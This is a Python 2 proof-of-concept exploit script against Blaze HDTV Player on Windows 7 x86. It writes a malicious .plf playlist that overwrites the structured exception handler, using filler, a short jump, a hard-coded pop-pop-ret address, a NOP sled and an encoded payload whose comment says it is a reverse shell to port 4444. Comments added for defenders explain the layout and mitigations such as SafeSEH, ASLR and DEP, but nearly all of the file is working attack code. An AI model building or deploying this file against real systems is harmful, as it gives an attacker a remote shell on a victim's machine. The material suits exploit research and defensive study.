#!/usr/bin/env python
# blazepoc-antiSEH.py / Win7x86 Blaze HDTV Player
#
# Proof-of-concept file generator. It writes a .plf playlist file whose
# contents are laid out, in order, as: filler, a 4-byte next-SEH field,
# a 4-byte SEH handler address, a NOP sled, and the author's payload.
# Written in Python 2 syntax (print statements; str literals used as raw
# bytes) -- this is not Python 3 code.
#
# Defender's note: the handler address below is hard-coded, so the PoC
# presumably relies on that module being loaded at a fixed base and not
# being SafeSEH-protected -- neither is confirmed by this file alone.
# Mitigations such as SafeSEH/ASLR/DEP on the host are what break this
# class of overwrite.
import struct
# Output file name, relative to the current working directory.
file = 'blazed_again5.plf'
x = open(file,'w')
# 608 bytes of filler placed before the SEH fields.
junk = "A" * 608
# SEH handler address, packed little-endian (struct '<L').
seh = struct.pack('<L', 0x6032a665) # 0x6032a665 : pop ecx # pop ecx # ret
# Next-SEH field: 2-byte short jump (0xEB = JMP rel8, displacement 6) plus 2 bytes of padding.
jmp = "\xeb\x06" + "A"*2 #NSEH to JMP ESP
# 20-byte NOP sled preceding the payload.
nops = "\x90" * 20
# Payload bytes exactly as embedded by the author; the comment states a reverse shell to port 4444.
shellcode = "" # revshell .36:4444
shellcode += "\xb8\xb6\x89\x75\xf7\xd9\xe8\xd9\x74\x24\xf4\x5b\x33"
shellcode += "\xc9\xb1\x52\x31\x43\x12\x83\xc3\x04\x03\xf5\x87\x97"
shellcode += "\x02\x05\x7f\xd5\xed\xf5\x80\xba\x64\x10\xb1\xfa\x13"
shellcode += "\x51\xe2\xca\x50\x37\x0f\xa0\x35\xa3\x84\xc4\x91\xc4"
shellcode += "\x2d\x62\xc4\xeb\xae\xdf\x34\x6a\x2d\x22\x69\x4c\x0c"
shellcode += "\xed\x7c\x8d\x49\x10\x8c\xdf\x02\x5e\x23\xcf\x27\x2a"
shellcode += "\xf8\x64\x7b\xba\x78\x99\xcc\xbd\xa9\x0c\x46\xe4\x69"
shellcode += "\xaf\x8b\x9c\x23\xb7\xc8\x99\xfa\x4c\x3a\x55\xfd\x84"
shellcode += "\x72\x96\x52\xe9\xba\x65\xaa\x2e\x7c\x96\xd9\x46\x7e"
shellcode += "\x2b\xda\x9d\xfc\xf7\x6f\x05\xa6\x7c\xd7\xe1\x56\x50"
shellcode += "\x8e\x62\x54\x1d\xc4\x2c\x79\xa0\x09\x47\x85\x29\xac"
shellcode += "\x87\x0f\x69\x8b\x03\x4b\x29\xb2\x12\x31\x9c\xcb\x44"
shellcode += "\x9a\x41\x6e\x0f\x37\x95\x03\x52\x50\x5a\x2e\x6c\xa0"
shellcode += "\xf4\x39\x1f\x92\x5b\x92\xb7\x9e\x14\x3c\x40\xe0\x0e"
shellcode += "\xf8\xde\x1f\xb1\xf9\xf7\xdb\xe5\xa9\x6f\xcd\x85\x21"
shellcode += "\x6f\xf2\x53\xe5\x3f\x5c\x0c\x46\xef\x1c\xfc\x2e\xe5"
shellcode += "\x92\x23\x4e\x06\x79\x4c\xe5\xfd\xea\xb3\x52\xfc\xce"
shellcode += "\x5b\xa1\xfe\x1f\xc0\x2c\x18\x75\xe8\x78\xb3\xe2\x91"
shellcode += "\x20\x4f\x92\x5e\xff\x2a\x94\xd5\x0c\xcb\x5b\x1e\x78"
shellcode += "\xdf\x0c\xee\x37\xbd\x9b\xf1\xed\xa9\x40\x63\x6a\x29"
shellcode += "\x0e\x98\x25\x7e\x47\x6e\x3c\xea\x75\xc9\x96\x08\x84"
shellcode += "\x8f\xd1\x88\x53\x6c\xdf\x11\x11\xc8\xfb\x01\xef\xd1"
shellcode += "\x47\x75\xbf\x87\x11\x23\x79\x7e\xd0\x9d\xd3\x2d\xba"
shellcode += "\x49\xa5\x1d\x7d\x0f\xaa\x4b\x0b\xef\x1b\x22\x4a\x10"
shellcode += "\x93\xa2\x5a\x69\xc9\x52\xa4\xa0\x49\x72\x47\x60\xa4"
shellcode += "\x1b\xde\xe1\x05\x46\xe1\xdc\x4a\x7f\x62\xd4\x32\x84"
shellcode += "\x7a\x9d\x37\xc0\x3c\x4e\x4a\x59\xa9\x70\xf9\x5a\xf8"
# Final file contents in offset order: 608 + 4 + 4 + 20 bytes, then the payload.
payload = junk + jmp + seh + nops + shellcode
print 'pay:len: %d' % ( len(payload) )
x.write(payload)
print "file %s is ready" % ( file )
x.close()